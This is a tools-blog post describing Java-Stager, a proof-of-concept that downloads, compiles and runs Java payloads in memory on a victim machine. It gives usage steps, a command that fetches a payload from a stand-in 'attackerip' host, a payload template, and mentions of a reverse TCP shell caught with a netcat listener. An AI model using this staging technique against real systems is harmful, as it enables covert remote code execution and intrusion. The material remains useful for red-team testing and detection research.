Categories: Kali Linux

Java-Stager : A PoC To Download, Compile & Execute A Java File In Memory

A PoC Java-Stager which can download, compile, and execute a Java file in memory.

The key parts of the talk for me are:

  • Load a Stager onto victim (touches disk, but is a benign binary)
  • Stager downloads raw code over HTTP (which stays in memory)
  • Stager compiles raw code (also in memory)
  • Stager then executes compiled code (also in memory)

Also Read theZoo – A Repository Of LIVE Malwares For Your Own Joy & Pleasure

How To Use Java-Stager

  • Clone down the entire repository.
  • Open it in an IDE which can use maven (such as NetBeans)
  • The Stager, and the example payload are available in the “/src/main/java” folder.
  • Alter the Stager as you would like and compile the project. I was using “clean/build” in the default profile.

The output in NetBeans Included a line like this:

Building jar: C:\Users\cornerpirate\Documents\NetBeansProjects\java-stager\target\JavaStager-0.1-initial.jar

To work on your victim you must upload the “JavaStager*.jar” file and the “lib” folder containing Janino from the “target” folder.

The following command will execute the stager:

java -jar JavaStager-0.1-initial.jar

You will be prompted with the usage as shown:

Proper Usage is: java -jar JavaStager-0.1-initial.jar <url>

The “url” is the only parameter that is passed to Stager. An example usage would be:

java -jar JavaStager-0.1-initial.jar http://attackerip/Payload.java

Your payload must be in a file called “Payload.java” and your exploit code must be in a static method called “Run”. The following shows the template if you want to write your own:

public class Payload {
   public static void Run() {
      // Your code here
   }
}

I have provided an example Reverse TCP payload in the file “TCPReverseShell.java”. To prevent name clashes this is not called “Payload.java” and the class name is wrong. The header comment in “TCPReverseShell.java” explains how to modify it to work.

You will need to host your “Payload.java” file on an HTTP server. The attacker will need to start a netcat listener to catch the connection back using the standard nc -lvp 8044 technique.

Credit: James Williams

R K

Share
Published by
R K
Tags: JavaJava-StagerNetBeans
6 years ago

Recent Posts

Starship : Revolutionizing Terminal Experiences Across Shells

Starship is a powerful, minimal, and highly customizable cross-shell prompt designed to enhance the terminal…

21 hours ago

Lemmy : A Decentralized Link Aggregator And Forum For The Fediverse

Lemmy is an innovative, open-source platform designed for link aggregation and discussion, providing a decentralized…

21 hours ago

Massive UX Improvements, Custom Disassemblers, And MSVC Support In ImHex v1.37.0

The latest release of ImHex v1.37.0 introduces a host of exciting features and improvements, enhancing…

23 hours ago

Ghauri : A Powerful SQL Injection Detection And Exploitation Tool

Ghauri is a cutting-edge, cross-platform tool designed to automate the detection and exploitation of SQL…

1 day ago

Writing Tools : Revolutionizing The Art Of Writing

Writing tools have become indispensable for individuals looking to enhance their writing efficiency, accuracy, and…

1 day ago

PatchWerk : A Tool For Cleaning NTDLL Syscall Stubs

PatchWerk is a proof-of-concept (PoC) tool designed to clean NTDLL syscall stubs by patching syscall…

2 days ago